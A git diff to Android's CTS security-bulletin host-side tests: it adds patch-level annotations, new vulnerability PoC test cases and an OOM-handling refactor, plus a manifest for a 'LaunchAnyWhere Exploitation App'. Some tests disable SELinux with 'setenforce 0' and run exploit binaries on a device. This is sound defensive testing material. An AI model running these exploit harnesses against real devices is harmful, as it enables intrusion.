+ AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ }
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
index a6f1e04..0239883 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
@@ -23,20 +23,20 @@
/**
* b/31824853
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2016_8479() throws Exception {
if (containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runPocNoOutput("CVE-2016-8479", getDevice(), 180);
+ AdbUtils.runPocNoOutput("CVE-2016-8479", getDevice(), 180);
// CTS begins the next test before device finishes rebooting,
// sleep to allow time for device to reboot.
- Thread.sleep(30000);
+ Thread.sleep(70000);
}
}
/**
* b/33940449
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0508() throws Exception {
if (containsDriver(getDevice(), "/dev/ion") &&
containsDriver(getDevice(), "/dev/dri/renderD129")) {
@@ -50,7 +50,7 @@
/**
* b/33899363
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0333() throws Exception {
if (containsDriver(getDevice(), "/dev/dri/renderD128")) {
AdbUtils.runPocNoOutput("CVE-2017-0333", getDevice(), 30);
@@ -62,31 +62,31 @@
/**
* b/33245849
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0334() throws Exception {
if (containsDriver(getDevice(), "/dev/dri/renderD129")) {
String out = AdbUtils.runPoc("CVE-2017-0334", getDevice());
- assertNotMatchesMultiLine(".*Leaked ptr is (0x[fF]{6}[cC]0[a-fA-F0-9]{8}"
- +"|0x[c-fC-F][a-fA-F0-9]{7}).*",out);
+ assertNotMatchesMultiLine("Leaked ptr is (0x[fF]{6}[cC]0[a-fA-F0-9]{8}"
+ +"|0x[c-fC-F][a-fA-F0-9]{7})",out);
}
}
/**
* b/32707507
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0479() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPocNoOutput("CVE-2017-0479", getDevice(), 60);
String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatchesMultiLine(".*Fatal signal 11 \\(SIGSEGV\\).*>>> /system/bin/" +
- "audioserver <<<.*", logcatOut);
+ assertNotMatchesMultiLine("Fatal signal 11 \\(SIGSEGV\\).*>>> /system/bin/" +
+ "audioserver <<<", logcatOut);
}
/*
* b/33178389
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0490() throws Exception {
String bootCountBefore =
AdbUtils.runCommandLine("settings get global boot_count", getDevice());
@@ -101,4 +101,5 @@
updateKernelStartTime();
assertEquals(bootCountBefore, bootCountAfter);
}
+
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
index 71e3975..248e257 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
@@ -24,7 +24,7 @@
/**
* b/32342065
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2017_0553() throws Exception {
// Error code of 139 represents segmentation fault
getDevice().executeShellCommand("chmod +x /data/local/tmp/CVE-2017-0553");
@@ -35,7 +35,7 @@
/**
* b/72460737
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2014_3145() throws Exception {
assertFalse("VULNERABLE DEVICE DETECTED",
AdbUtils.runPocCheckExitCode("CVE-2014-3145", getDevice(), 60));
@@ -44,9 +44,24 @@
/**
* b/32813456
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2016_10229() throws Exception {
String out = AdbUtils.runPoc("CVE-2016-10229", getDevice());
- assertNotMatchesMultiLine(".*OVERWRITE.*", out);
+ assertNotMatchesMultiLine("OVERWRITE", out);
}
+
+ /**
+ * b/33621647
+ */
+ @SecurityTest(minPatchLevel = "2017-04")
+ public void testPocCVE_2017_0477() throws Exception {
+ AdbUtils.pushResource("/CVE-2017-0477.gif", "/data/local/tmp/CVE-2017-0477.gif",
+ getDevice());
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+
+ // because runPocGetExitCode() isn't a thing
+ AdbUtils.runCommandLine("chmod +x /data/local/tmp/CVE-2017-0477", getDevice());
+ int code = AdbUtils.runCommandGetExitCode("/data/local/tmp/CVE-2017-0477", getDevice());
+ assertTrue(code != 139); // 128 + signal 11
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
deleted file mode 100644
index 2d6b44a..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ /dev/null
@@ -1,35 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-@SecurityTest
-public class Poc17_05 extends SecurityTestCase {
-
- /**
- * b/34277115
- */
- @SecurityTest
- public void testPocCVE_2017_0630() throws Exception {
- if (containsDriver(getDevice(), "/sys/kernel/debug/tracing/printk_formats")) {
- String commandOutput = AdbUtils.runCommandLine("cat /sys/kernel/debug/tracing" +
- "/printk_formats", getDevice());
- assertNotMatchesMultiLine(".*0x(?!0){8,16}[0-9a-fA-F]{8,16} : .*", commandOutput);
- }
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java
new file mode 100644
index 0000000..c2c3e29
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java
@@ -0,0 +1,41 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import java.util.concurrent.TimeUnit;
+
+@SecurityTest
+public class Poc17_06 extends SecurityTestCase {
+
+ /**
+ * b/36392138
+ */
+ @SecurityTest(minPatchLevel = "2017-06")
+ public void testPocCVE_2017_0647() throws Exception {
+ AdbUtils.pushResource("/CVE-2017-0647.zip", "/data/local/tmp/CVE-2017-0647.zip",
+ getDevice());
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runCommandLine(
+ "dex2oat " +
+ "--dex-file=/data/local/tmp/CVE-2017-0647.zip " +
+ "--oat-file=/data/local/tmp/out " +
+ "--base=0x50000000", getDevice());
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Zip: missed a central dir sig", logcatOut);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
index 1f9602a..29b7a39 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
@@ -24,7 +24,7 @@
/**
* b/35443725
**/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testPocCVE_2016_2109() throws Exception {
assertFalse("Overallocation detected!",
AdbUtils.runPocCheckExitCode("CVE-2016-2109",
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
index 987233d..1659397 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
@@ -24,7 +24,7 @@
/**
* b/63852675
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testPocCve_2017_6983() throws Exception {
// Error code of 139 represents segmentation fault
assertFalse("Segfault found",
@@ -57,7 +57,7 @@
* b/38195738
* b/36590192
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testPocBug_38195738() throws Exception {
if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
AdbUtils.runPocNoOutput("Bug-38195738", getDevice(), 60);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
index 8f1771b..e1c4977 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
@@ -24,7 +24,7 @@
/**
* b/36075131
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-11")
public void testPocCVE_2017_0859() throws Exception {
AdbUtils.runCommandLine("logcat -c", getDevice());
AdbUtils.pushResource("/cve_2017_0859.mp4", "/sdcard/cve_2017_0859.mp4", getDevice());
@@ -34,8 +34,8 @@
// Wait for intent to be processed before checking logcat
Thread.sleep(5000);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*Fatal signal 11 \\(SIGSEGV\\)" +
+ assertNotMatchesMultiLine("Fatal signal 11 \\(SIGSEGV\\)" +
"[\\s\\n\\S]*>>> /system/bin/" +
- "mediaserver <<<[\\s\\n\\S]*", logcat);
+ "mediaserver <<<", logcat);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
index 799e0b6..67becec 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
@@ -24,10 +24,10 @@
/**
* b/38045794
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void testPocCVE_2017_6262() throws Exception {
if(containsDriver(getDevice(),"/dev/dri/renderD128")) {
- AdbUtils.runPocNoOutput("CVE-2017-6262", getDevice(), 900);
+ AdbUtils.runPocNoOutput("CVE-2017-6262", getDevice(), 300);
}
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
index a0fd9c1..c9f48f9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
@@ -24,20 +24,20 @@
/**
* b/68953950
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testPocCVE_2017_13232() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPocNoOutput("CVE-2017-13232", getDevice(), 60);
String logcatOutput = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatchesMultiLine(".*APM_AudioPolicyManager: getOutputForAttr\\(\\) "+
- "invalid attributes: usage=.{1,} content=.{1,} "+
- "flags=.{1,} tags=\\[.{256,}\\].*", logcatOutput);
+ assertNotMatchesMultiLine("APM_AudioPolicyManager: getOutputForAttr\\(\\) " +
+ "invalid attributes: usage=.{1,15} content=.{1,15} " +
+ "flags=.{1,15} tags=\\[A{256,}\\]", logcatOutput);
}
/**
* b/65853158
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testPocCVE_2017_13273() throws Exception {
AdbUtils.runCommandLine("dmesg -c" ,getDevice());
AdbUtils.runCommandLine("setenforce 0",getDevice());
@@ -46,10 +46,9 @@
AdbUtils.runPoc("CVE-2017-13273", getDevice(), 60);
String dmesgOut = AdbUtils.runCommandLine("cat /sys/fs/pstore/console-ramoops",
getDevice());
- assertNotMatches("[\\s\\n\\S]*CVE-2017-132736 Tainted:" + "[\\s\\n\\S]*" +
+ assertNotMatchesMultiLine("CVE-2017-132736 Tainted:" + "[\\s\\n\\S]*" +
"Kernel panic - not syncing: Fatal exception in interrupt", dmesgOut);
}
AdbUtils.runCommandLine("setenforce 1",getDevice());
}
}
-
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
index 6398164..4bf7b80 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
@@ -23,9 +23,9 @@
/**
* b/71389378
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-03")
public void testPocCVE_2017_13253() throws Exception {
String output = AdbUtils.runPoc("CVE-2017-13253", getDevice());
- assertNotMatchesMultiLine(".*OVERFLOW DETECTED.*",output);
+ assertNotMatchesMultiLine("OVERFLOW DETECTED",output);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
new file mode 100644
index 0000000..02436e7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
@@ -0,0 +1,32 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.runner.RunWith;
+
+public class Poc18_04 extends SecurityTestCase {
+ /**
+ * b/69683251
+ * Does not require root but must be a hostside test to avoid
+ * a race condition
+ */
+ @SecurityTest(minPatchLevel = "2018-04")
+ public void testPocCVE_2017_13286() throws Exception {
+ LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
new file mode 100644
index 0000000..9364d28
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
@@ -0,0 +1,41 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc18_05 extends SecurityTestCase {
+ /**
+ * b/70721937
+ * Does not require root but must be a hostside test to avoid a race
+ * condition
+ */
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void testPocCVE_2017_13315() throws Exception {
+ LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice());
+ }
+
+ /**
+ * b/73085795
+ * Does not require root but must be a hostside test to avoid a race condition
+ */
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void testPocCVE_2017_13312() throws Exception {
+ LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
index 6efaafd..9595d5a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
@@ -25,11 +25,11 @@
/**
* b/76221123
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-07")
public void testPocCVE_2018_9424() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPoc("CVE-2018-9424", getDevice(), 60);
String result = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*Fatal signal [\\s\\n\\S]*", result);
+ assertNotMatchesMultiLine("Fatal signal", result);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
index c6a0014..0423b37 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
@@ -22,6 +22,22 @@
public class Poc18_10 extends SecurityTestCase {
/**
+ * b/111641492
+ */
+ @SecurityTest(minPatchLevel = "2018-10")
+ public void testPocCVE_2018_9515() throws Exception {
+ AdbUtils.runCommandLine("rm /sdcard/Android/data/CVE-2018-9515", getDevice());
+ AdbUtils.runCommandLine("mkdir /sdcard/Android/data/CVE-2018-9515", getDevice());
+ AdbUtils.runPocNoOutput("CVE-2018-9515", getDevice(), 300);
+ boolean vulnerableBecauseCrashed = getDevice().waitForDeviceNotAvailable(10_000);
+ if (vulnerableBecauseCrashed) {
+ // wait for device to come online so we can clean up
+ getDevice().waitForDeviceAvailable(120_000); // 2 minutes
+ }
+ AdbUtils.runCommandLine("rm -rf /sdcard/Android/data/CVE-2018-9515", getDevice());
+ }
+
+ /**
* b/111274046
*/
@SecurityTest
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
new file mode 100644
index 0000000..9e50e1e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
@@ -0,0 +1,34 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+import static org.junit.Assert.*;
+
+@SecurityTest
+public class Poc18_11 extends SecurityTestCase {
+
+ /**
+ * b/111330641
+ */
+ @SecurityTest(minPatchLevel = "2018-11")
+ public void testPocCVE_2018_9525() throws Exception {
+ assertTrue(AdbUtils.runCommandGetExitCode(
+ "pm dump com.android.settings | grep SliceBroadcastReceiver", getDevice()) != 0);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
index 24d1226..eea1380 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
@@ -26,7 +26,6 @@
import java.util.regex.Matcher;
import java.util.Map;
import java.util.HashMap;
-import com.android.ddmlib.MultiLineReceiver;
import com.android.ddmlib.Log;
public class SecurityTestCase extends DeviceTestCase {
@@ -35,28 +34,7 @@
private long kernelStartTime;
- private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = 1024 * 1024; // 1GB
- private boolean isLowMemoryDevice = false;
- private static Map<ITestDevice, OomCatcher> oomCatchers = new HashMap<>();
- private static Map<ITestDevice, Long> totalMemories = new HashMap<>();
- private enum OomBehavior {
- FAIL_AND_LOG, // normal behavior
- PASS_AND_LOG, // skip tests that oom low memory devices
- FAIL_NO_LOG, // tests that check for oom
- }
- private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads
- private boolean oomDetected = false; // accessed across threads
-
- private static long getMemTotal(ITestDevice device) throws Exception {
- String memInfo = device.executeShellCommand("cat /proc/meminfo");
- Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]");
- Matcher matcher = pattern.matcher(memInfo);
- if (matcher.find()) {
- return Long.parseLong(matcher.group(1));
- } else {
- throw new Exception("Could not get device memory total");
- }
- }
+ private HostsideOomCatcher oomCatcher = new HostsideOomCatcher(this);
/**
* Waits for device to be online, marks the most recent boottime of the device
@@ -71,35 +49,7 @@
//TODO:(badash@): Watch for other things to track.
// Specifically time when app framework starts
- // Singleton for caching device TotalMem to avoid and adb shell for every test.
- Long totalMemory = totalMemories.get(getDevice());
- if (totalMemory == null) {
- totalMemory = getMemTotal(getDevice());
- totalMemories.put(getDevice(), totalMemory);
- }
- isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB;
-
- // reset test oom behavior
- // Low memory devices should skip (pass) tests when OOMing and log so that the
- // high-memory-test flag can be added. Normal devices should fail tests that OOM so that
- // they'll be ran again with --retry. If the test OOMs because previous tests used the
- // memory, it will likely pass on a second try.
- synchronized (this) { // synchronized for oomBehavior and oomDetected.
- if (isLowMemoryDevice) {
- oomBehavior = OomBehavior.PASS_AND_LOG;
- } else {
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- }
- oomDetected = false;
- }
-
- // Singleton OOM detection in separate persistent threads for each device.
- OomCatcher oomCatcher = oomCatchers.get(getDevice());
- if (oomCatcher == null || !oomCatcher.isAlive()) {
- oomCatcher = new OomCatcher();
- oomCatchers.put(getDevice(), oomCatcher);
- oomCatcher.start();
- }
+ oomCatcher.start();
}
/**
@@ -143,6 +93,8 @@
*/
@Override
public void tearDown() throws Exception {
+ oomCatcher.stop(getDevice().getSerialNumber());
+
getDevice().waitForDeviceAvailable(120 * 1000);
String uptime = getDevice().executeShellCommand("cat /proc/uptime");
assertTrue("Phone has had a hard reset",
@@ -152,20 +104,17 @@
//TODO(badash@): add ability to catch runtime restart
getDevice().disableAdbRoot();
- // pass, fail, or log based on the oom behavior
- synchronized (this) { // synchronized for oomDetected and oomBehavior
- if (oomDetected) {
- switch (oomBehavior) {
- case FAIL_AND_LOG:
- fail("The device ran out of memory.");
- return;
- case PASS_AND_LOG:
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test.");
- return;
- case FAIL_NO_LOG:
- fail();
- return;
- }
+ if (oomCatcher.isOomDetected()) {
+ switch (oomCatcher.getOomBehavior()) {
+ case FAIL_AND_LOG:
+ fail("The device ran out of memory.");
+ return;
+ case PASS_AND_LOG:
+ Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test.");
+ return;
+ case FAIL_NO_LOG:
+ fail();
+ return;
}
}
}
@@ -176,7 +125,7 @@
public void assertMatchesMultiLine(String pattern, String input) throws Exception {
assertTrue("Pattern not found: " + pattern,
- Pattern.compile(pattern).matcher(input).find());
+ Pattern.compile(pattern, Pattern.DOTALL|Pattern.MULTILINE).matcher(input).find());
}
public void assertNotMatches(String pattern, String input) throws Exception {
@@ -185,67 +134,6 @@
public void assertNotMatchesMultiLine(String pattern, String input) throws Exception {
assertFalse("Pattern found: " + pattern,
- Pattern.compile(pattern).matcher(input).find());
- }
-
- // Flag meaning the test will likely fail on devices with low memory.
- public void setHighMemoryTest() {
- synchronized (this) { // synchronized for oomBehavior
- if (isLowMemoryDevice) {
- oomBehavior = OomBehavior.PASS_AND_LOG;
- } else {
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- }
- }
- }
-
- // Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability
- // intentionally OOMs the device.
- public void setOomTest() {
- synchronized (this) { // synchronized for oomBehavior
- oomBehavior = OomBehavior.FAIL_NO_LOG;
- }
- }
-
- class OomCatcher extends Thread {
-
- @Override
- public void run() {
- MultiLineReceiver rcvr = new MultiLineReceiver() {
- private boolean isCancelled = false;
-
- public void processNewLines(String[] lines) {
- for (String line : lines) {
- if (Pattern.matches(".*lowmemorykiller.*", line)) {
- // low memory detected, reboot device to clear memory and pass test
- isCancelled = true;
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "lowmemorykiller detected; rebooting device.");
- synchronized (SecurityTestCase.this) { // synchronized for oomDetected
- oomDetected = true;
- }
- try {
- getDevice().rebootUntilOnline();
- updateKernelStartTime();
- } catch (Exception e) {
- Log.e(LOG_TAG, e.toString());
- }
- return; // we don't need to process remaining lines in the array
- }
- }
- }
-
- public boolean isCancelled() {
- return isCancelled;
- }
- };
-
- try {
- AdbUtils.runCommandLine("logcat -c", getDevice());
- getDevice().executeShellCommand("logcat", rcvr);
- } catch (Exception e) {
- Log.e(LOG_TAG, e.toString());
- }
- }
+ Pattern.compile(pattern, Pattern.DOTALL|Pattern.MULTILINE).matcher(input).find());
}
}
diff --git a/tests/tests/permission/testapps/Android.mk b/hostsidetests/securitybulletin/test-apps/Android.mk
similarity index 77%
rename from tests/tests/permission/testapps/Android.mk
rename to hostsidetests/securitybulletin/test-apps/Android.mk
index 9aaa6ac..f8d63a5 100644
--- a/tests/tests/permission/testapps/Android.mk
+++ b/hostsidetests/securitybulletin/test-apps/Android.mk
@@ -12,6 +12,12 @@
# See the License for the specific language governing permissions and
# limitations under the License.
-LOCAL_PATH:= $(call my-dir)
+LOCAL_PATH := $(call my-dir)
-include $(call all-makefiles-under,$(LOCAL_PATH))
+include $(CLEAR_VARS)
+
+# tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+
+# Build the test APKs using their own makefiles
+include $(call all-makefiles-under,$(LOCAL_PATH))
\ No newline at end of file
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/Android.mk b/hostsidetests/securitybulletin/test-apps/launchanywhere/Android.mk
similarity index 71%
copy from tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/Android.mk
copy to hostsidetests/securitybulletin/test-apps/launchanywhere/Android.mk
index 512d6ac..226c360 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/Android.mk
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/Android.mk
@@ -1,3 +1,4 @@
+#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
@@ -12,20 +13,22 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
-LOCAL_PATH:= $(call my-dir)
+
+LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE_TAGS := tests
LOCAL_SDK_VERSION := current
-LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := CtsHostLaunchAnyWhereApp
# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests cts_instant
-LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey1
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
-LOCAL_PACKAGE_NAME := CtsVictimPermissionDefinerApp
+LOCAL_PROGUARD_ENABLED := disabled
+LOCAL_DEX_PREOPT := false
-
-include $(BUILD_CTS_PACKAGE)
+include $(BUILD_CTS_SUPPORT_PACKAGE)
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/launchanywhere/AndroidManifest.xml
new file mode 100644
index 0000000..1553c92
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/AndroidManifest.xml
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2018 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.security.cts.launchanywhere"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <application android:label="LaunchAnyWhere Exploitation App">
+ <activity android:name=".StartExploit">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <service android:name=".AuthenticatorService"
+ android:enabled="true"
+ android:exported="true">
+
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/launchanywhere_authenticator" />
+ </service>
+
+ </application>
+</manifest>
\ No newline at end of file
